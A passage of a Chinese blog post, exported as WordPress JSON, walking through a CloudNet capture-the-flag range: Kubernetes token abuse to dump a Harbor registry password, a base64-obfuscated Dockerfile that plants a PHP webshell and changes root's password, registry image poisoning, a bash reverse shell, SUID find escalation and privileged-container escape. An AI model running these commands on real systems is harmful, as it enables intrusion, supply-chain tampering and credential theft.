frame 0\n        TX packets 173965  bytes 40294589 (38.4 MiB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n\neth1: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500\n        inet 172.22.18.61  netmask 255.255.0.0  broadcast 172.22.255.255\n        inet6 fe80::216:3eff:fe37:f614  prefixlen 64  scopeid 0x20&lt;link&gt;\n        ether 00:16:3e:37:f6:14  txqueuelen 1000  (Ethernet)\n        RX packets 286612  bytes 279041525 (266.1 MiB)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 7634  bytes 1230043 (1.1 MiB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0<\/code><\/pre>\n<p>\u8fd9\u91cc\u540c\u6837\u901a\u8fc7scp\u4f20\u4e2afscan\u626b\u4e00\u4e0b<code>172.22.15.75<\/code><\/p>\n<pre><code class=\"language-text\">start infoscan\n172.22.15.75:179 open\n172.22.15.75:22 open\n172.22.15.75:111 open\n172.22.15.75:2380 open\n172.22.15.75:2379 open\n172.22.15.75:5000 open\n172.22.15.75:6443 open\n172.22.15.75:9253 open\n172.22.15.75:9353 open\n172.22.15.75:10259 open\n172.22.15.75:10249 open\n172.22.15.75:10257 open\n172.22.15.75:10250 open\n172.22.15.75:10256 open\n172.22.15.75:10248 open\n172.22.15.75:30020 open\n172.22.15.75:32686 open\n[*] alive ports len is: 17\nstart vulscan\n[*] WebTitle http:\/\/172.22.15.75:9253  code:404 len:19     title:None\n[*] WebTitle http:\/\/172.22.15.75:9353  code:404 len:19     title:None\n[*] WebTitle http:\/\/172.22.15.75:5000  code:200 len:0      title:None\n[*] WebTitle http:\/\/172.22.15.75:10248 code:404 len:19     title:None\n[*] WebTitle https:\/\/172.22.15.75:32686 code:200 len:1422   title:Kubernetes Dashboard\n[*] WebTitle http:\/\/172.22.15.75:10249 code:404 len:19     title:None\n[*] WebTitle http:\/\/172.22.15.75:10256 code:404 len:19     title:None\n[*] WebTitle https:\/\/172.22.15.75:10250 code:404 len:19     title:None\n[*] WebTitle https:\/\/172.22.15.75:6443 code:401 len:157    title:None\n[*] WebTitle https:\/\/172.22.15.75:10257 code:403 len:217    title:None\n[+] InfoScan https:\/\/172.22.15.75:32686 [Kubernetes] \n[*] WebTitle https:\/\/172.22.15.75:10259 code:403 len:217    title:None<\/code><\/pre>\n<p>\u53ef\u4ee5\u770b\u5230\u5f00\u653e\u4e866443\u7aef\u53e3\uff0c<code>https:\/\/172.22.15.75:6443<\/code>\u8ddf\u524d\u9762\u63d0\u5230\u7684<code>https:\/\/10.68.0.1<\/code>\u90fd\u6307\u5411\u7684\u662f Kubernetes API Server\uff0c\u53ea\u662f\u4e00\u4e2a\u662fnode ip\uff0c\u4e00\u4e2a\u662f Cluster ip\uff0c\u9a8c\u8bc1\u4e00\u4e0b\uff0c\u540c\u6837\u53ef\u4ee5\u76f4\u63a5\u7528 kubectl \u76f4\u63a5\u6307\u5b9a token \u6267\u884c\u547d\u4ee4<\/p>\n<pre><code class=\"language-text\">kubectl -s https:\/\/172.22.15.75:6443\/ --insecure-skip-tls-verify=true --token=eyJhbGci... describe nodes<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_39.png\" alt=\"cloudnet_39\" \/><\/p>\n<p>\u8fd9\u91cc\u5217\u51fa\u96c6\u7fa4\u6240\u6709\u8d44\u6e90\u7c7b\u578b\uff0c\u53ef\u4ee5\u770b\u5230\u6709secrets\u8d44\u6e90<\/p>\n<pre><code class=\"language-text\">kubectl --kubeconfig k8s.yaml api-resources<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_40.png\" alt=\"cloudnet_40\" \/><\/p>\n<p>\u663e\u793asecrets\u8d44\u6e90\uff0c\u53d1\u73b0\u524d\u9762Dashboard\u4e2d\u770b\u5230\u7684<code>harbor-registry-secret<\/code>\uff0c\u6253\u5370\u51fa\u6765<\/p>\n<pre><code class=\"language-text\">kubectl --kubeconfig k8s.yaml get secrets\nkubectl --kubeconfig k8s.yaml get secrets harbor-registry-secret\nkubectl --kubeconfig k8s.yaml get secret harbor-registry-secret -o jsonpath=&#039;{.data.\\.dockerconfigjson}&#039;<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_41.png\" alt=\"cloudnet_41\" \/><\/p>\n<p>base64\u89e3\u7801\u5f97\u5230 harbor \u7684admin\u8d26\u5bc6<\/p>\n<pre><code class=\"language-json\">{&quot;auths&quot;:{&quot;172.22.18.64&quot;:{&quot;username&quot;:&quot;admin&quot;,&quot;password&quot;:&quot;password@nk9DLwqce&quot;,&quot;auth&quot;:&quot;YWRtaW46cGFzc3dvcmRAbms5REx3cWNl&quot;}}}<\/code><\/pre>\n<h4>Harbor\u79c1\u6709\u4ed3\u5e93\u955c\u50cf\u62c9\u53d6<\/h4>\n<p>\u767b\u5f55\u4e4b\u540e\u5c31\u53ef\u4ee5\u770b\u5230\u539f\u672c\u770b\u4e0d\u5230\u7684\u79c1\u6709\u955c\u50cf\u4ed3\u5e93\u4e86<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_42.png\" alt=\"cloudnet_42\" \/><\/p>\n<p>\u62c9\u53d6<code>hospital\/flag<\/code>\u955c\u50cf<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_43.png\" alt=\"cloudnet_43\" \/><\/p>\n<p>\u62c9\u4e4b\u524d\u8981\u5148\u7528\u8be5\u8d26\u5bc6\u767b\u5f55\u4e00\u4e0bdocker<\/p>\n<pre><code class=\"language-text\">proxychains4 -q docker login 172.22.18.64\nproxychains4 -q docker pull 172.22.18.64\/hospital\/flag@sha256:850b67d6a14da0e6ff76c87d9eb3dc6d788090ad5998e8d12244a6e235d3911a\n\u6216\u8005\nproxychains4 -q docker pull 172.22.18.64\/hospital\/flag:latest<\/code><\/pre>\n<p>pull\u7684\u5de8\u5de8\u5de8\u5de8\u5de8\u5de8\u5de8\u5de8\u5de8\u6162\uff0c\u8fdb\u53bb\u62ff\u5230\u7b2c\u4e03\u4e2aflag<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_44.png\" alt=\"cloudnet_44\" \/><\/p>\n<h3>flag8<\/h3>\n<h4>Harbor\u955c\u50cf\u540c\u6b65<\/h4>\n<p>\u63a5\u7740\u770b<code>hospital:system<\/code>\u955c\u50cf\u65e5\u5fd7\uff0c\u53ef\u4ee5\u770b\u5230admin\u6bcf\u9694\u4e00\u6bb5\u65f6\u95f4\u5c31\u4f1a\u62c9\u53d6\u8be5\u955c\u50cf<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_45.png\" alt=\"cloudnet_45\" \/><\/p>\n<p>\u56de\u5230master\u8282\u70b9\u90a3\u53f0\u5bbf\u4e3b\u673a\uff0c\u5199\u4e2a\u516c\u94a5<\/p>\n<pre><code class=\"language-text\">echo -e &quot;\\n\\nssh-rsa AAAAB3N...kwaQ== root@kali\\n\\n&quot; &gt;&gt; \/simho\/root\/.ssh\/authorized_keys \n\nssh root@172.22.15.75<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_46.png\" alt=\"cloudnet_46\" \/><\/p>\n<p>\u53ef\u4ee5\u770b\u5230\u5185\u7f51ip<code>172.22.50.75<\/code>\uff0c\u8fd8\u662f\u901a\u8fc7scp\u4f20fscan\u626b\u4e00\u4e0b\u65b0\u7f51\u6bb5\uff0c\u5728<code>172.22.50.45<\/code>\u673a\u5668\u6709web\u670d\u52a1<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_47.png\" alt=\"cloudnet_47\" \/><\/p>\n<p>\u5c06<code>hospital\/system<\/code>\u955c\u50cfpull\u5230\u672c\u5730<\/p>\n<pre><code class=\"language-text\">proxychains4 -q docker pull 172.22.18.64\/hospital\/system:latest<\/code><\/pre>\n<p>\u53d1\u73b0\u8be5\u955c\u50cf\u4e5f\u6709web\u670d\u52a1\uff0c\u5bf9\u6bd4\u53d1\u73b0\u8be5\u955c\u50cf\u8ddf<code>172.22.50.45<\/code>\u673a\u5668\u7684web\u670d\u52a1\u90fd\u6709<code>p.php<\/code>\u6587\u4ef6\uff0c\u56e0\u6b64\u57fa\u672c\u8bf4\u660eadmin\u7528\u6237\u5c31\u662f\u5b9a\u65f6\u5c06\u955c\u50cf\u7ed9pull\u5230\u8fd9\u53f0\u673a\u5668\u4e0a<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_48.png\" alt=\"cloudnet_48\" \/><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_49.png\" alt=\"cloudnet_49\" \/><\/p>\n<p>\u521b\u5efa\u6076\u610fDockerfile\u6587\u4ef6\uff0c\u4e3b\u8981\u505a\u4e86\u4e09\u4e2a\u6b65\u9aa4<\/p>\n<ul>\n<li>\u5728web\u76ee\u5f55\u5199webshell<\/li>\n<li>\u7ed9find\u6587\u4ef6\u6dfb\u52a0suid\u6743\u9650<\/li>\n<li>\u5c06root\u7528\u6237\u5bc6\u7801\u6539\u4e3a<code>password<\/code><\/li>\n<\/ul>\n<pre><code class=\"language-text\">FROM 172.22.18.64\/hospital\/system\n\nRUN echo ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+JyA+IC92YXIvd3d3L2h0bWwvc2hlbGwucGhwICYmIGNobW9kIHUrcyAvdXNyL2Jpbi9maW5k | base64 -d | bash &amp;&amp; echo password | echo ZWNobyAicm9vdDpwYXNzd29yZCIgfCBjaHBhc3N3ZA== | base64 -d | bash\n\nENTRYPOINT [&quot;\/usr\/sbin\/apache2ctl&quot;, &quot;-D&quot;, &quot;FOREGROUND&quot;]<\/code><\/pre>\n<p>\u5728\u672c\u5730\u5c06\u8be5Dockerfile\u6587\u4ef6\u5236\u4f5c\u6210\u955c\u50cf\uff0c\u5e76push\u5230docker\uff0c\u7b49\u5f8520\u5206\u949f\u4e00\u8f6e\u7684\u62c9\u53d6<\/p>\n<pre><code class=\"language-text\">proxychains4 -q docker build -t 172.22.18.64\/hospital\/system . \nproxychains4 -q docker push 172.22.18.64\/hospital\/system<\/code><\/pre>\n<p>\u4e4b\u540e\u8681\u5251\u8fde\u63a5\uff0c\u5728tmp\u76ee\u5f55\u4e0b\u65b0\u5efa\u4e00\u4e2ash\u811a\u672c\uff0c\u5185\u5bb9\u662f\u5f39\u4e00\u4e2ashell\u5230master\u8282\u70b9\u5bbf\u4e3b\u673a<\/p>\n<p>shell.sh<\/p>\n<pre><code class=\"language-shell\">#!\/bin\/sh\nbash -c &quot;\/bin\/bash -i &gt;&amp; \/dev\/tcp\/172.22.15.75\/4567 0&gt;&amp;1&quot;<\/code><\/pre>\n<p>\u6267\u884c\u524d\u8bb0\u5f97\u5148\u5728master\u8282\u70b9\u5bbf\u4e3b\u673a\u5f00\u542f\u76d1\u542c\uff0c\u5e94\u8be5\u90a3\u53f0\u673a\u6ca1\u6709nc\uff0c\u56e0\u6b64\u5148scp\u4f20\u4e00\u4e2a\u4e0a\u53bb<\/p>\n<pre><code class=\"language-text\">\/usr\/bin\/find .\/ -exec .\/shell.sh \\;<\/code><\/pre>\n<h4>Docker privileged\u63d0\u6743<\/h4>\n<p>\u6b64\u65f6\u63d0\u6743\u5230root\u6743\u9650\uff0c\u5229\u7528privileged\u63d0\u6743\u9003\u9038\uff0c\u62ff\u5230\u8be5\u5bbf\u4e3b\u673a\u4e0a\u7684\u6700\u540e\u4e00\u4e2aflag<\/p>\n<pre><code class=\"language-bash\">cat \/proc\/self\/status | grep -qi &quot;0000003fffffffff&quot; &amp;&amp; echo &quot;Is privileged mode&quot; || echo &quot;Not privileged mode&quot;\ncat \/proc\/self\/status | grep CapEff\n# 0000003fffffffff \u6216\u662f 0000001fffffffff\n\ndf -h \nmkdir \/simho\nmount \/dev\/vda3 \/simho \ncat \/simho\/flag.txt<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_50.png\" alt=\"cloudnet_50\" \/><\/p>\n<h3>\u62d3\u6251\u56fe<\/h3>\n<p>\u6839\u636e\u6574\u4f53\u73af\u5883\uff0c\u753b\u4e86\u4e2a\u5927\u81f4\u7684\u62d3\u6251\u56fe<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_51.png\" alt=\"cloudnet_51.png\" \/><\/p>\n<p>\u300a\u53d7 \u76ca \u826f \u591a\u300b.jpg<\/p>\n<div class=\"clearfix\"><\/div>","protected":false},"excerpt":{"rendered":"<p>CloudNet \u6700\u8be6\u7ec6\u7684\u4e00\u96c6\uff09 \u6d89\u53ca\u7684\u77e5\u8bc6\u70b9 O2OA \u9ed8\u8ba4\u8d26\u5bc6+\u540e\u53f0RCE minio\u6570\u636e\u540c\u6b65RCE Mi [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-1063","post","type-post","status-publish","format-standard","hentry","category-pentesting"],"views":1122,"_links":{"self":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/1063","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=1063"}],"version-history":[{"count":6,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/1063\/revisions"}],"predecessor-version":[{"id":1080,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/1063\/revisions\/1080"}],"wp:attachment":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=1063"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=1063"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=1063"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}